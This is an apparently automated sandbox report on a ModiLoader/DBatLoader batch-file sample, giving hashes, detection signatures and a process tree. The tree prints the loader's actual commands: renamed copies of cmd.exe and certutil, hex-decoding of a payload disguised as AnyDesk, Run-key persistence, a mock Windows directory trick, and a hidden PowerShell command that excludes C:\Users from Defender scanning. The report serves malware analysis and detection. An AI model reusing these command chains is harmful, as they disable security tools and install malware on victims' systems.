Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-11-2024 04:09
Static task
static1
Behavioral task
behavioral1
Sample
2a81c419a9fcd1eb9f778dba6911c366586b0ae9a5cf2cd25155413bfbff9eea.cmd
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
2a81c419a9fcd1eb9f778dba6911c366586b0ae9a5cf2cd25155413bfbff9eea.cmd
Resource
win10v2004-20241007-en
General
-
Target
2a81c419a9fcd1eb9f778dba6911c366586b0ae9a5cf2cd25155413bfbff9eea.cmd
-
Size
3.2MB
-
MD5
5f351f07b94613764a8bc09970bbcd58
-
SHA1
47fcfcac926a0007010b7afb776671d2276b8b81
-
SHA256
2a81c419a9fcd1eb9f778dba6911c366586b0ae9a5cf2cd25155413bfbff9eea
-
SHA512
49ddfcc8f58117ec824e35b1a2bf6928cf580e4337a8f9aa1d7d4dc62a6e93bb811702d0ed2c970f1f0a08b013ffc5ba6dcc6951c6d59f9a0d7915c3b9f3baae
-
SSDEEP
24576:/EldPvpS3bi8Kz95FnA8S21f063u9vsk/ZkSgR+lY1Q7FZU1n9dJCNUeE1Zperr8:/ARo3biB55HSwTBvfbb
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
ModiLoader Second Stage 61 IoCs
Processes:
resource yara_rule behavioral2/memory/468-29-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-34-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-37-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-43-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-48-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-63-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-80-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-62-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-78-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-97-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-96-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-95-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-93-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-91-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-67-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-87-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-86-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-85-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-65-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-82-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-77-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-60-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-73-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-94-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-57-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-69-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-90-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-68-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-66-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-83-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-64-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-81-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-79-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-50-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-61-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-49-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-59-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-75-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-58-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-74-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-72-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-56-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-71-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-70-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-55-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-54-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-53-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-52-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-51-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-47-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-46-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-45-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-44-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-42-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-41-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-40-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-39-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-38-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-33-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-36-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 behavioral2/memory/468-35-0x0000000002D80000-0x0000000003D80000-memory.dmp modiloader_stage2 -
Executes dropped EXE 18 IoCs
Processes:
alpha.exealpha.exekn.exealpha.exekn.exeAnyDesk.PIFalpha.exealpha.exealpha.pifalpha.pifalpha.pifxpha.pifper.exepha.pifalpha.pifalpha.pifalpha.pifaymtmquJ.pifpid process 4532 alpha.exe 2544 alpha.exe 4700 kn.exe 2908 alpha.exe 1164 kn.exe 468 AnyDesk.PIF 4968 alpha.exe 1360 alpha.exe 4652 alpha.pif 936 alpha.pif 5080 alpha.pif 1628 xpha.pif 932 per.exe 4032 pha.pif 4876 alpha.pif 3944 alpha.pif 2672 alpha.pif 1992 aymtmquJ.pif -
Loads dropped DLL 1 IoCs
Processes:
per.exepid process 932 per.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
AnyDesk.PIFdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya = "C:\\Users\\Public\\Juqmtmya.url" AnyDesk.PIF -
Suspicious use of SetThreadContext 1 IoCs
Processes:
AnyDesk.PIFdescription pid process target process PID 468 set thread context of 1992 468 AnyDesk.PIF aymtmquJ.pif -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2664 1992 WerFault.exe aymtmquJ.pif -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
alpha.pifalpha.pifalpha.pifAnyDesk.PIFcmd.exealpha.pifxpha.pifalpha.pifalpha.pifdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AnyDesk.PIF Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
pha.pifpid process 4032 pha.pif 4032 pha.pif -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
pha.pifdescription pid process Token: SeDebugPrivilege 4032 pha.pif -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exeAnyDesk.PIFcmd.exealpha.pifper.exedescription pid process target process PID 1636 wrote to memory of 4784 1636 cmd.exe extrac32.exe PID 1636 wrote to memory of 4784 1636 cmd.exe extrac32.exe PID 1636 wrote to memory of 4532 1636 cmd.exe alpha.exe PID 1636 wrote to memory of 4532 1636 cmd.exe alpha.exe PID 4532 wrote to memory of 5076 4532 alpha.exe extrac32.exe PID 4532 wrote to memory of 5076 4532 alpha.exe extrac32.exe PID 1636 wrote to memory of 2544 1636 cmd.exe alpha.exe PID 1636 wrote to memory of 2544 1636 cmd.exe alpha.exe PID 2544 wrote to memory of 4700 2544 alpha.exe kn.exe PID 2544 wrote to memory of 4700 2544 alpha.exe kn.exe PID 1636 wrote to memory of 2908 1636 cmd.exe alpha.exe PID 1636 wrote to memory of 2908 1636 cmd.exe alpha.exe PID 2908 wrote to memory of 1164 2908 alpha.exe kn.exe PID 2908 wrote to memory of 1164 2908 alpha.exe kn.exe PID 1636 wrote to memory of 468 1636 cmd.exe AnyDesk.PIF PID 1636 wrote to memory of 468 1636 cmd.exe AnyDesk.PIF PID 1636 wrote to memory of 468 1636 cmd.exe AnyDesk.PIF PID 1636 wrote to memory of 4968 1636 cmd.exe alpha.exe PID 1636 wrote to memory of 4968 1636 cmd.exe alpha.exe PID 1636 wrote to memory of 1360 1636 cmd.exe alpha.exe PID 1636 wrote to memory of 1360 1636 cmd.exe alpha.exe PID 468 wrote to memory of 4568 468 AnyDesk.PIF cmd.exe PID 468 wrote to memory of 4568 468 AnyDesk.PIF cmd.exe PID 468 wrote to memory of 4568 468 AnyDesk.PIF cmd.exe PID 4568 wrote to memory of 1636 4568 cmd.exe esentutl.exe PID 4568 wrote to memory of 1636 4568 cmd.exe esentutl.exe PID 4568 wrote to memory of 1636 4568 cmd.exe esentutl.exe PID 4568 wrote to memory of 3160 4568 cmd.exe esentutl.exe PID 4568 wrote to memory of 3160 4568 cmd.exe esentutl.exe PID 4568 wrote to memory of 3160 4568 cmd.exe esentutl.exe PID 4568 wrote to memory of 4652 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 4652 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 4652 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 936 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 936 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 936 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 5080 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 5080 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 5080 4568 cmd.exe alpha.pif PID 5080 wrote to memory of 1628 5080 alpha.pif xpha.pif PID 5080 wrote to memory of 1628 5080 alpha.pif xpha.pif PID 5080 wrote to memory of 1628 5080 alpha.pif xpha.pif PID 4568 wrote to memory of 932 4568 cmd.exe per.exe PID 4568 wrote to memory of 932 4568 cmd.exe per.exe PID 932 wrote to memory of 3240 932 per.exe esentutl.exe PID 932 wrote to memory of 3240 932 per.exe esentutl.exe PID 932 wrote to memory of 4032 932 per.exe pha.pif PID 932 wrote to memory of 4032 932 per.exe pha.pif PID 4568 wrote to memory of 4876 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 4876 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 4876 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 3944 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 3944 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 3944 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 2672 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 2672 4568 cmd.exe alpha.pif PID 4568 wrote to memory of 2672 4568 cmd.exe alpha.pif PID 468 wrote to memory of 3188 468 AnyDesk.PIF esentutl.exe PID 468 wrote to memory of 3188 468 AnyDesk.PIF esentutl.exe PID 468 wrote to memory of 3188 468 AnyDesk.PIF esentutl.exe PID 468 wrote to memory of 1992 468 AnyDesk.PIF aymtmquJ.pif PID 468 wrote to memory of 1992 468 AnyDesk.PIF aymtmquJ.pif PID 468 wrote to memory of 1992 468 AnyDesk.PIF aymtmquJ.pif PID 468 wrote to memory of 1992 468 AnyDesk.PIF aymtmquJ.pif
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2a81c419a9fcd1eb9f778dba6911c366586b0ae9a5cf2cd25155413bfbff9eea.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:4784
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:5076
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\2a81c419a9fcd1eb9f778dba6911c366586b0ae9a5cf2cd25155413bfbff9eea.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\2a81c419a9fcd1eb9f778dba6911c366586b0ae9a5cf2cd25155413bfbff9eea.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 93⤵
- Executes dropped EXE
PID:4700
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 123⤵
- Executes dropped EXE
PID:1164
-
-
-
C:\Users\Public\Libraries\AnyDesk.PIFC:\Users\Public\Libraries\AnyDesk.PIF2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\SysWOW64\esentutl.exeC:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o4⤵PID:1636
-
-
C:\Windows\SysWOW64\esentutl.exeC:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3160
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4652
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:936
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 104⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Users\Public\xpha.pifC:\\Users\\Public\\xpha.pif 127.0.0.1 -n 105⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1628
-
-
-
C:\Windows \SysWOW64\per.exe"C:\\Windows \\SysWOW64\\per.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Windows\SYSTEM32\esentutl.exeesentutl /y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe /d C:\\Users\\Public\\pha.pif /o5⤵PID:3240
-
-
C:\Users\Public\pha.pifC:\\Users\\Public\\pha.pif -WindowStyle hidden -Command Add-MpPreference -ExclusionPath 'C:\Users'5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4876
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW644⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3944
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2672
-
-
-
C:\Windows\SysWOW64\esentutl.exeC:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o3⤵PID:3188
-
-
C:\Users\Public\Libraries\aymtmquJ.pifC:\Users\Public\Libraries\aymtmquJ.pif3⤵
- Executes dropped EXE
PID:1992 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 124⤵
- Program crash
PID:2664
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:4968
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1360
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1992 -ip 19921⤵PID:4764
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.3MB
MD504ad7e38aa2f399b5862e6267697632a
SHA1a30e9c94bb215f0b96a651432f8f74f4a06284de
SHA256da4101eba193661f3016d2b4b6328cf8d0cb16ac58c1470683bc07d8baf34ebe
SHA512b7cacc98c0d5c7b3f03cde8b294cb6534be25c560e78c6cf5304285774b56493e98346152a587162d1347eddc7f751bd164a78dd257383b0b59b37d89d6ba5a8
-
Filesize
1.2MB
MD52ef70d96354cc04d9168e8f69e7b17a0
SHA192eee1bb5de4f4d50805101b83e4a3a1a602856b
SHA2565842b3e5271efed831bf21f4821431bb1a7dcc94bafab135b62d34bfdb32f503
SHA5123c46f059b5e2c806efdfea71dad8bcc236bfc753dc3b15e637d6697231313b68232d0f4bc6921b41ed76f2471891718678ec7b6c6dda0a5d7c9f7ae8a57580b3
-
Filesize
60KB
MD5b87f096cbc25570329e2bb59fee57580
SHA1d281d1bf37b4fb46f90973afc65eece3908532b2
SHA256d08ccc9b1e3acc205fe754bad8416964e9711815e9ceed5e6af73d8e9035ec9e
SHA51272901adde38f50cf6d74743c0a546c0fea8b1cd4a18449048a0758a7593a176fc33aad1ebfd955775eefc2b30532bcc18e4f2964b3731b668dd87d94405951f7
-
Filesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
231KB
MD5d0fce3afa6aa1d58ce9fa336cc2b675b
SHA14048488de6ba4bfef9edf103755519f1f762668f
SHA2564d89fc34d5f0f9babd022271c585a9477bf41e834e46b991deaa0530fdb25e22
SHA51280e127ef81752cd50f9ea2d662dc4d3bf8db8d29680e75fa5fc406ca22cafa5c4d89ef2eac65b486413d3cdd57a2c12a1cb75f65d1e312a717d262265736d1c2
-
Filesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
18KB
MD5b3624dd758ccecf93a1226cef252ca12
SHA1fcf4dad8c4ad101504b1bf47cbbddbac36b558a7
SHA2564aaa74f294c15aeb37ada8185d0dead58bd87276a01a814abc0c4b40545bf2ef
SHA512c613d18511b00fa25fc7b1bdde10d96debb42a99b5aaab9e9826538d0e229085bb371f0197f6b1086c4f9c605f01e71287ffc5442f701a95d67c232a5f031838
-
Filesize
115KB
MD5fc9b64a2b1006891bf39ebf395b4eba8
SHA10e98ba291d77ff8a57b5ebe198ff0c2e6c2bea00
SHA2561093d0809ed5223c8ea2d723032c0ee2bfd1d971ad6ac69904983ec545000b3d
SHA5129d5a9716b71b436dd465cdf8ed8471747828420cec7c5dad3406072e53f8de6e31253968e55ef49dc19a8245993b00164f193a3752cc16fce3887c4737db906d
-
Filesize
94KB
MD5869640d0a3f838694ab4dfea9e2f544d
SHA1bdc42b280446ba53624ff23f314aadb861566832
SHA2560db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323
SHA5126e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7